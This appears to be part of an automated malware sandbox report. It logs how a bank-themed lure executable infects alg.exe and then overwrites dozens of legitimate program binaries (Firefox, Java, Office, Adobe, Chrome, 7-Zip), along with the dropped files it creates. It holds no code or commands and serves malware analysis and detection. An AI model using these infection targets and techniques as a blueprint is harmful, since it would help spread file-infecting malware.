Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSACCESS.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\Locator.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7z.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	System file written: C:\Windows\System32\AppVClient.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\SysWOW64\perfhost.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\msiexec.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lynchtmlconv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\FXSSVC.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\SensorDataService.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\msdtc.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to behavior

Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File created: C:\Users\user\AppData\Local\differences\niellist.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
